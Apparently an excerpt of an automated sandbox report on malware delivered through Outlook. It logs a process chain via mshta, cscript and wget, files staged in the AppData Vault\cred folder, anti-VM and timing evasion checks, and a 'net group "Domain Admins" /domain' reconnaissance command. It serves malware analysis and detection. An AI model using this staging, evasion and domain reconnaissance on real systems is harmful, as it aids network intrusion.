Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_00423860 rdtsc

15_2_00423860

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\conhost.exe

Window / User API: threadDelayed 804

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_16-102344

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	API coverage: 7.5 %
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	API coverage: 7.2 %
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	API coverage: 0.6 %

Source: C:\Windows\SysWOW64\mshta.exe TID: 420	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe TID: 3000	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 3792	Thread sleep count: 33 > 30

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Domain FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\net.exe net group "Domain Admins" /domain
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\net.exe net group "Domain Admins" /domain

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041FE80 LoadLibraryA,GetProcAddress,strlen,malloc,strcpy,strcat,FindFirstFileExA,FindNextFileA,FindClose,FreeLibrary,FindFirstFileA,	15_2_0041FE80
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041F460 isalpha,FindFirstFileA,strcpy,FindClose,strcpy,FindClose,_errno,_errno,	15_2_0041F460
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041B000 strlen,malloc,strlen,malloc,strcpy,FindFirstFileA,strcpy,free,free,free,	15_2_0041B000
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041B0F9 FindFirstFileA,strcpy,free,	15_2_0041B0F9
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041FD10 GetModuleHandleA,GetProcAddress,GetFileAttributesA,FreeLibrary,FindFirstFileA,FindClose,	15_2_0041FD10
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041FDCC FreeLibrary,FindFirstFileA,FindClose,	15_2_0041FDCC
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041F66C FindFirstFileA,strcpy,FindClose,strcpy,	15_2_0041F66C
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E06AFD FindFirstFileA,FindNextFileA,_strlen,_strlen,_strlen,FindClose,	16_2_00E06AFD
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E20B20 FindFirstFileExW,	16_2_00E20B20
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB44528 _Java_sun_nio_fs_WindowsNativeDispatcher_FindFirstFile0@20,FindFirstFileW,wcslen,GetLastError,	19_2_6FB44528
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB445EF _Java_sun_nio_fs_WindowsNativeDispatcher_FindFirstFile1@24,FindFirstFileW,GetLastError,	19_2_6FB445EF
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD3FA60 _Open_dir,FindFirstFileExW,__Read_dir,FindClose,	19_2_6FD3FA60

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_00423040 GetLogicalDriveStringsA,GetProcessHeap,HeapAlloc,GetLogicalDriveStringsA,

15_2_00423040

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_0041EC0E GetSystemInfo,

15_2_0041EC0E

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Vault\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\

Source: mshta.exe, 00000000.00000003.2202654128.000000000D42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CDDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200525572.000000000D939000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: C:/msys64/qemu/opt/misc-i686/ssl
Source: mshta.exe, 00000000.00000003.2202654128.000000000D42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CDDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200525572.000000000D939000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: C:/msys64/qemu/opt/misc-i686/ssl/certs
Source: rundll32.exe, 00000002.00000002.2130155401.0000000000640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
Source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: Unable to link/verify VirtualMachineError class
Source: wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: -0x0x%d.%d.%d.%d%nTRUEFALSEtrueYESyesfalse, value=name=%d.%d.%d.%d%X:<invalid length=%d>%XX509V3_parse_listX509V3_get_value_bools2i_ASN1_INTEGERi2s_ASN1_INTEGERbignum_to_stringi2s_ASN1_ENUMERATEDx509v3_add_len_valuecrypto/x509/x509_att.cname=%sX509_ATTRIBUTE_get0_dataX509_ATTRIBUTE_set1_dataX509_ATTRIBUTE_create_by_txtX509_ATTRIBUTE_create_by_OBJX509_ATTRIBUTE_create_by_NIDX509at_add1_attrECMD5crypto/x509/x509_cmp.cSHA1-fipsX509_check_private_keyX509_add_certsX509_add_certossl_x509_add_cert_newC:/msys64/qemu/opt/misc-i686/ssl/privateC:/msys64/qemu/opt/misc-i686/binC:/msys64/qemu/opt/misc-i686/sslC:/msys64/qemu/opt/misc-i686/ssl/certsC:/msys64/qemu/opt/misc-i686/ssl/cert.pemSSL_CERT_DIRSSL_CERT_FILEcrypto/x509/x509_lu.cX509_STORE_get1_all_certsX509_OBJECT_newX509_STORE_add_crlX509_STORE_add_certX509_STORE_add_lookupX509_STORE_newX509_LOOKUP_newcrypto/x509/x509_obj.cNO X509_NAME0123456789ABCDEFX509_NAME_oneline
Source: wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: <null>%s, Name (%s : %d), Properties (%s)OSSL_DECODER_CTX_set_paramsOSSL_DECODER_CTX_newossl_decoder_get_numberossl_decoder_parsed_propertiesOSSL_DECODER_get0_propertiesOSSL_DECODER_get0_providerinner_ossl_decoder_fetchossl_decoder_newossl_decoder_from_algorithmdata-typecrypto/encode_decode/decoder_pkey.creferenceid-ecPublicKey1.2.840.10045.2.1SM2OSSL_DECODER_CTX_new_for_pkeyossl_decoder_ctx_setup_for_pkeycrypto/user/eng_init.cuser_finishuser_inituser_unlocked_finishcrypto/user/eng_lib.cuser_set_nameuser_set_idint_cleanup_itemuser_newcrypto/user/eng_list.cdynamicOPENSSL_userSC:/msys64/qemu/opt/misc-i686/lib/users-3C:/msys64/qemu/opt/misc-i686/binID2DIR_LOADDIR_ADD1LIST_ADDLOADid=%suser_up_refuser_by_iduser_list_removeuser_removeuser_list_adduser_adduser_get_prevuser_get_nextuser_get_lastuser_get_firstcrypto/user/eng_pkey.cuser_load_ssl_client_certuser_load_public_keyuser_load_private_keycrypto/user/tb_asnmth.cuser_pkey_asn1_find_struser_get_pkey_asn1_methcrypto/user/tb_cipher.cuser_get_ciphercrypto/user/tb_dh.c
Source: javaw.exe, 0000001F.00000003.3269958275.0000000014865000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: mshta.exe, 00000000.00000002.2247223645.0000000007812000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201999349.000000000780F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201999349.000000000781C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2247160232.00000000077FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216712851.000000000780E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217602385.000000000780F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216712851.00000000077FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216712851.000000000781C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217602385.000000000781C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2244452730.000000000781C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2244452730.0000000007810000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: javaw.exe, 00000010.00000002.3195693153.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000013.00000002.3218995612.0000000001601000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cjava/lang/VirtualMachineError
Source: mshta.exe, 00000000.00000003.2202654128.000000000D42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CDDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ySzlib compression(undef)crypto/comp/comp_lib.cCOMP_CTX_newcrypto/conf/conf_mod.cconfig_diagnosticsopenssl_confopenssl_conf=%spathOPENSSL_initOPENSSL_finishmodule=%s, path=%smodule=%smodule=%s, value=%s retcode=%-8dOPENSSL_CONFopenssl.cnf/%s%s%sCONF_parse_listmodule_initmodule_addmodule_load_dsodo_init_module_list_lockmodule_runCONF_modules_loadcrypto/conf/conf_ssl.csection=%sname=%s, value=%sssl_confssl_module_initcrypto/ct/ct_log.cdescriptionkeyenabled_logsC:/msys64/qemu/opt/misc-i686/ssl/ct_log_list.cnfCTLOG_FILESHA2-256ct_v1_log_id_from_pkeyCTLOG_new_exctlog_store_load_ctx_newctlog_new_from_confctlog_store_load_logCTLOG_STORE_load_fileCTLOG_STORE_new_excrypto/ct/ct_oct.ci2o_SCT_LISTo2i_SCT_LISTi2o_SCTi2o_SCT_signatureo2i_SCTo2i_SCT_signaturecrypto/ct/ct_policy.cCT_POLICY_EVAL_CTX_new_excrypto/ct/ct_sct.cSCT_set1_signatureSCT_set1_extensionsSCT_set_signature_nidSCT_set1_log_idSCT_set0_log_idSCT_set_log_entry_typeSCT_set_versionSCT_newcrypto/ct/ct_sct_ctx.cSHA2-256SCT_CTX_newcrypto/ct/ct_vfy.cSHA2-256SCT_CTX_verifydes(long)
Source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: _well_known_klasses[SystemDictionary::VirtualMachineError_klass_knum]
Source: javaw.exe, 00000010.00000002.3195693153.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000013.00000002.3218995612.0000000001601000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _[Ljava/lang/VirtualMachineError;
Source: mshta.exe, 00000000.00000003.2202654128.000000000D42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CDDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200525572.000000000D939000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: C:/msys64/qemu/opt/misc-i686/ssl/cert.pem
Source: javaw.exe, 00000010.00000003.3165514581.000000001546E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000013.00000003.3211509327.00000000154F1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000001F.00000003.3269958275.0000000014865000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: java/lang/VirtualMachineError.classPK
Source: mshta.exe, 00000000.00000003.2202654128.000000000D42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CDDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200525572.000000000D939000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: G_-0x0x%d.%d.%d.%d%nTRUEFALSEtrueYESyesfalse, value=name=%d.%d.%d.%d%X:<invalid length=%d>%XX509V3_parse_listX509V3_get_value_bools2i_ASN1_INTEGERi2s_ASN1_INTEGERbignum_to_stringi2s_ASN1_ENUMERATEDx509v3_add_len_valuecrypto/x509/x509_att.cname=%sX509_ATTRIBUTE_get0_dataX509_ATTRIBUTE_set1_dataX509_ATTRIBUTE_create_by_txtX509_ATTRIBUTE_create_by_OBJX509_ATTRIBUTE_create_by_NIDX509at_add1_attrECMD5crypto/x509/x509_cmp.cSHA1-fipsX509_check_private_keyX509_add_certsX509_add_certossl_x509_add_cert_newC:/msys64/qemu/opt/misc-i686/ssl/privateC:/msys64/qemu/opt/misc-i686/binC:/msys64/qemu/opt/misc-i686/sslC:/msys64/qemu/opt/misc-i686/ssl/certsC:/msys64/qemu/opt/misc-i686/ssl/cert.pemSSL_CERT_DIRSSL_CERT_FILEcrypto/x509/x509_lu.cX509_STORE_get1_all_certsX509_OBJECT_newX509_STORE_add_crlX509_STORE_add_certX509_STORE_add_lookupX509_STORE_newX509_LOOKUP_newcrypto/x509/x509_obj.cNO X509_NAME0123456789ABCDEFX509_NAME_oneline
Source: mshta.exe, 00000000.00000003.2200629700.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000D42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2199936338.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CDDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200074325.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ]VH^V<null>%s, Name (%s : %d), Properties (%s)OSSL_DECODER_CTX_set_paramsOSSL_DECODER_CTX_newossl_decoder_get_numberossl_decoder_parsed_propertiesOSSL_DECODER_get0_propertiesOSSL_DECODER_get0_providerinner_ossl_decoder_fetchossl_decoder_newossl_decoder_from_algorithmdata-typecrypto/encode_decode/decoder_pkey.creferenceid-ecPublicKey1.2.840.10045.2.1SM2OSSL_DECODER_CTX_new_for_pkeyossl_decoder_ctx_setup_for_pkeycrypto/user/eng_init.cuser_finishuser_inituser_unlocked_finishcrypto/user/eng_lib.cuser_set_nameuser_set_idint_cleanup_itemuser_newcrypto/user/eng_list.cdynamicOPENSSL_userSC:/msys64/qemu/opt/misc-i686/lib/users-3C:/msys64/qemu/opt/misc-i686/binID2DIR_LOADDIR_ADD1LIST_ADDLOADid=%suser_up_refuser_by_iduser_list_removeuser_removeuser_list_adduser_adduser_get_prevuser_get_nextuser_get_lastuser_get_firstcrypto/user/eng_pkey.cuser_load_ssl_client_certuser_load_public_keyuser_load_private_keycrypto/user/tb_asnmth.cuser_pkey_asn1_find_struser_get_pkey_asn1_methcrypto/user/tb_cipher.cuser_get_ciphercrypto/user/tb_dh.c
Source: mshta.exe, 00000000.00000003.2200629700.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000D42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2199936338.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CDDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200074325.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200525572.000000000D939000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: C:/msys64/qemu/opt/misc-i686/bin
Source: mshta.exe, 00000000.00000003.2202654128.000000000D42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CDDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200525572.000000000D939000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [.crypto/provider_conf.csection=%s not foundidentitysoft_loadmoduleactivateprovidersprovider_conf_activateprovider_conf_loadprovider_conf_initcrypto/provider_core.copenssl-version3.1.0provider-namemodule-filenameOPENSSL_MODULESC:/msys64/qemu/opt/misc-i686/lib/ossl-modulesC:/msys64/qemu/opt/misc-i686/binname=%sOSSL_provider_initname=%s, provider has no provider init function
Source: mshta.exe, 00000000.00000003.2200629700.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000D42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2199936338.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CDDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200074325.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: C:/msys64/qemu/opt/misc-i686/ssl/ct_log_list.cnf
Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: ; gcc -IC:/msys64/qemu/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -DCARES_STATICLIB -IC:/msys64/qemu/opt/misc-i686/include -DPCRE2_STATIC -IC:/msys64/qemu/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -DHAVE_LIBSSL -I -IC:/msys64/qemu/opt/misc-i686/include -DNDEBUG -ggdb -mtune=broadwell -mtune=znver2 -O2 -pipe -L/opt/misc-i686/lib -LC:/msys64/qemu/opt/misc-i686/lib -lmetalink -LC:/msys64/qemu/opt/misc-i686/lib -lcares -LC:/msys64/qemu/opt/misc-i686/lib -lpcre2-8 -LC:/msys64/qemu/opt/misc-i686/lib -lidn2 -LC:/msys64/qemu/opt/misc-i686/lib -lssl -lcrypto -L -lz -LC:/msys64/qemu/opt/misc-i686/lib -lpsl -lws2_32 -lole32 -lcrypt32 -lexpat -LC:/msys64/qemu/opt/misc-i686/lib -lgpgme ../lib/libgnu.a -lws2_32 -lws2_32 -lws2_32 -lws2_32 /opt/misc-i686/lib/libiconv.a /opt/misc-i686/lib/libunistring.a /opt/misc-i686/lib/libiconv.a -lws2_32gcc -DHAVE_CONFIG_H -DSYSTEM_WGETRC="/opt/misc-i686/etc/wgetrc" -DLOCALEDIR="/opt/misc-i686/share/locale" -I. -I../../src -I../lib -I../../lib -I/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -DCARES_STATICLIB -IC:/msys64/qemu/opt/misc-i686/include -DPCRE2_STATIC -IC:/msys64/qemu/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -DHAVE_LIBSSL -I -IC:/msys64/qemu/opt/misc-i686/include -DNDEBUG -ggdb -mtune=broadwell -mtune=znver2 -O2 -pipe1.21.4
Source: wget.exe, 0000000B.00000002.3048435966.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3195693153.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000013.00000002.3218995612.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: C:/msys64/qemu/opt/misc-i686/etc/wgetrc %s (system)
